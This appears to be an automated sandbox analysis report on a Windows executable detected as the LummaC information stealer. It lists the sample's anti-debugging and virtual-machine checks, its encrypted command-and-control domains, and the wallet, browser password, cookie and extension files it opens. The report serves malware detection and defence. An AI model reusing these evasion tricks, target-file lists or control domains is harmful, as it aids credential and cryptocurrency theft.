                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: 5460B64 second address: 5460B6A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: 5460B6A second address: 5460B6E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: 5460B6E second address: 5460B8D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007FCA893D8EF5h 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FCA18DB50EFh 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: 5460B8D second address: 5460BA5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FCA18C4F6A4h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: 5460BA5 second address: 5460BA9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: 547090B second address: 547090F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: 547090F second address: 547092A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCA18DB50F7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: 547092A second address: 547092F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: 547092F second address: 5470991 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop esi 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007FCA18DB50EEh 0x0000000f xchg eax, ebp 0x00000010 jmp 00007FCA18DB50F0h 0x00000015 mov ebp, esp 0x00000017 jmp 00007FCA18DB50F0h 0x0000001c xchg eax, esi 0x0000001d jmp 00007FCA18DB50F0h 0x00000022 push eax 0x00000023 pushad 0x00000024 mov si, bx 0x00000027 mov dl, D8h 0x00000029 popad 0x0000002a xchg eax, esi 0x0000002b push eax 0x0000002c push edx 0x0000002d jmp 00007FCA18DB50EBh 0x00000032 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: 5470991 second address: 54709D6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCA18C4F6A9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov esi, dword ptr [ebp+0Ch] 0x0000000c pushad 0x0000000d mov dh, ch 0x0000000f call 00007FCA18C4F6A9h 0x00000014 pop ebx 0x00000015 popad 0x00000016 test esi, esi 0x00000018 pushad 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c popad 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: 54709D6 second address: 5470A26 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCA18DB50F4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, 665467B1h 0x0000000e popad 0x0000000f je 00007FCA893D2AA9h 0x00000015 jmp 00007FCA18DB50ECh 0x0000001a cmp dword ptr [75AF459Ch], 05h 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007FCA18DB50F7h 0x00000028 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: 5470A26 second address: 5470A2C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: 5470A2C second address: 5470A30 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: 5470A30 second address: 5470A44 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007FCA892850F5h 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: 5470A44 second address: 5470A48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: 5470A48 second address: 5470A4E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: 5470A4E second address: 5470A6C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov si, bx 0x00000006 mov dl, 69h 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, esi 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FCA18DB50EEh 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: 5470A6C second address: 5470A70 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: 5470A70 second address: 5470A76 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: 5470A76 second address: 5470A87 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FCA18C4F69Dh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: 5470A87 second address: 5470A8B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: 5470A8B second address: 5470AA1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a mov esi, 42D43DF9h 0x0000000f push eax 0x00000010 push edx 0x00000011 mov eax, 609B02BBh 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: 5470AA1 second address: 5470AC4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 xchg eax, esi 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FCA18DB50F9h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: 5470B21 second address: 5470B8D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCA18C4F6A1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007FCA18C4F6A7h 0x00000011 sbb esi, 05291C1Eh 0x00000017 jmp 00007FCA18C4F6A9h 0x0000001c popfd 0x0000001d movzx eax, di 0x00000020 popad 0x00000021 xchg eax, esi 0x00000022 push eax 0x00000023 push edx 0x00000024 jmp 00007FCA18C4F6A6h 0x00000029 rdtsc
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRDTSC instruction interceptor: First address: 5470B8D second address: 5470B92 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Tries to evade debugger and weak emulator (self modifying code)
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeSpecial instruction interceptor: First address: C98C6D instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeSpecial instruction interceptor: First address: E38A02 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeSpecial instruction interceptor: First address: E61D38 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
                Source: C:\Users\user\Desktop\YKri2nEBWE.exe TID: 5876Thread sleep time: -240000s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\YKri2nEBWE.exe TID: 5876Thread sleep time: -30000s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                Source: YKri2nEBWE.exeBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                Source: YKri2nEBWE.exe, 00000000.00000003.2226172549.0000000005E26000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
                Source: YKri2nEBWE.exe, 00000000.00000002.2368272162.0000000001517000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW8
                Source: YKri2nEBWE.exe, 00000000.00000003.2226172549.0000000005E26000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696428655f
                Source: YKri2nEBWE.exe, 00000000.00000003.2226172549.0000000005E26000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
                Source: YKri2nEBWE.exe, 00000000.00000003.2226172549.0000000005E26000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
                Source: YKri2nEBWE.exe, 00000000.00000003.2226094654.0000000005E33000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: - GDCDYNVMware20,11696428655p
                Source: YKri2nEBWE.exe, 00000000.00000003.2226172549.0000000005E26000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696428655
                Source: YKri2nEBWE.exe, 00000000.00000003.2226172549.0000000005E26000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
                Source: YKri2nEBWE.exe, 00000000.00000003.2174597834.0000000001564000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2151309651.0000000001564000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2287052008.0000000001564000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2326949332.000000000155D000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000002.2368499776.0000000001564000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2309790359.0000000001564000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: YKri2nEBWE.exe, 00000000.00000003.2226172549.0000000005E26000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
                Source: YKri2nEBWE.exe, 00000000.00000003.2226172549.0000000005E26000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
                Source: YKri2nEBWE.exe, 00000000.00000003.2226172549.0000000005E26000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
                Source: YKri2nEBWE.exe, 00000000.00000003.2226172549.0000000005E26000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
                Source: YKri2nEBWE.exe, 00000000.00000003.2226172549.0000000005E26000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
                Source: YKri2nEBWE.exe, 00000000.00000003.2226172549.0000000005E26000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
                Source: YKri2nEBWE.exe, 00000000.00000003.2226172549.0000000005E26000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
                Source: YKri2nEBWE.exe, 00000000.00000003.2226172549.0000000005E26000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696428655t
                Source: YKri2nEBWE.exe, 00000000.00000003.2226172549.0000000005E26000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
                Source: YKri2nEBWE.exe, 00000000.00000003.2226172549.0000000005E26000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
                Source: YKri2nEBWE.exe, 00000000.00000003.2226172549.0000000005E26000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696428655s
                Source: YKri2nEBWE.exe, 00000000.00000003.2226172549.0000000005E26000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
                Source: YKri2nEBWE.exe, 00000000.00000003.2226172549.0000000005E26000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696428655
                Source: YKri2nEBWE.exe, 00000000.00000003.2226172549.0000000005E26000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696428655
                Source: YKri2nEBWE.exe, 00000000.00000003.2226172549.0000000005E26000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696428655o
                Source: YKri2nEBWE.exe, 00000000.00000003.2226172549.0000000005E26000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
                Source: YKri2nEBWE.exe, 00000000.00000003.2226172549.0000000005E26000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696428655t
                Source: YKri2nEBWE.exe, 00000000.00000003.2226172549.0000000005E26000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696428655
                Source: YKri2nEBWE.exe, 00000000.00000003.2226172549.0000000005E26000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
                Source: YKri2nEBWE.exe, 00000000.00000003.2226172549.0000000005E26000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696428655j
                Source: YKri2nEBWE.exe, 00000000.00000003.2226172549.0000000005E26000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
                Source: YKri2nEBWE.exe, 00000000.00000003.2226094654.0000000005E33000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: YNVMware
                Source: YKri2nEBWE.exe, 00000000.00000003.2226172549.0000000005E26000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
                Source: YKri2nEBWE.exe, 00000000.00000003.2226172549.0000000005E26000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696428655x
                Source: YKri2nEBWE.exeBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                Source: YKri2nEBWE.exe, 00000000.00000003.2226172549.0000000005E26000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
                Source: YKri2nEBWE.exe, 00000000.00000003.2226172549.0000000005E26000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeSystem information queried: ModuleInformationJump to behavior
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeProcess information queried: ProcessInformationJump to behavior

                Anti Debugging

                barindex
                Hides threads from debuggers
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeThread information set: HideFromDebuggerJump to behavior
                Tries to detect sandboxes and other dynamic analysis tools (window names)
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeOpen window title or class name: regmonclass
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeOpen window title or class name: gbdyllo
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeOpen window title or class name: procmon_window_class
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeOpen window title or class name: ollydbg
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeOpen window title or class name: filemonclass
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeFile opened: NTICE
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeFile opened: SICE
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeFile opened: SIWVID
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeCode function: 0_2_00C7E110 LdrInitializeThunk,0_2_00C7E110

                HIPS / PFW / Operating System Protection Evasion

                barindex
                LummaC encrypted strings found
                Source: YKri2nEBWE.exeString found in binary or memory: bashfulacid.lat
                Source: YKri2nEBWE.exeString found in binary or memory: curverpluch.lat
                Source: YKri2nEBWE.exeString found in binary or memory: tentabatte.lat
                Source: YKri2nEBWE.exeString found in binary or memory: shapestickyr.lat
                Source: YKri2nEBWE.exeString found in binary or memory: talkynicer.lat
                Source: YKri2nEBWE.exeString found in binary or memory: slipperyloo.lat
                Source: YKri2nEBWE.exeString found in binary or memory: manyrestro.lat
                Source: YKri2nEBWE.exeString found in binary or memory: observerfry.lat
                Source: YKri2nEBWE.exeString found in binary or memory: wordyfindy.lat
                Source: YKri2nEBWE.exe, YKri2nEBWE.exe, 00000000.00000002.2367606087.0000000000E5F000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: /Program Manager
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                Source: YKri2nEBWE.exe, 00000000.00000002.2368272162.0000000001532000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2366833614.000000000154A000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000002.2368457794.000000000154C000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2309790359.000000000154A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

                Stealing of Sensitive Information

                barindex
                Yara detected LummaC Stealer
                Source: Yara matchFile source: Process Memory Space: YKri2nEBWE.exe PID: 6460, type: MEMORYSTR
                Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                Found many strings related to Crypto-Wallets (likely being stolen)
                Source: YKri2nEBWE.exe, 00000000.00000003.2287052008.0000000001564000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/Electrum-LTC
                Source: YKri2nEBWE.exe, 00000000.00000003.2287052008.0000000001564000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/ElectronCash
                Source: YKri2nEBWE.exeString found in binary or memory: Jaxx Liberty
                Source: YKri2nEBWE.exe, 00000000.00000003.2287052008.0000000001564000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: window-state.json
                Source: YKri2nEBWE.exeString found in binary or memory: \??\C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
                Source: YKri2nEBWE.exeString found in binary or memory: \??\C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
                Source: YKri2nEBWE.exe, 00000000.00000003.2287052008.0000000001564000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/Ethereum
                Source: YKri2nEBWE.exeString found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
                Source: YKri2nEBWE.exe, 00000000.00000002.2368272162.0000000001529000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: keystore
                Tries to harvest and steal browser information (history, passwords, etc)
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cert9.dbJump to behavior
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqliteJump to behavior
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\formhistory.sqliteJump to behavior
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Users\user\Desktop\YKri2nEBWE.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
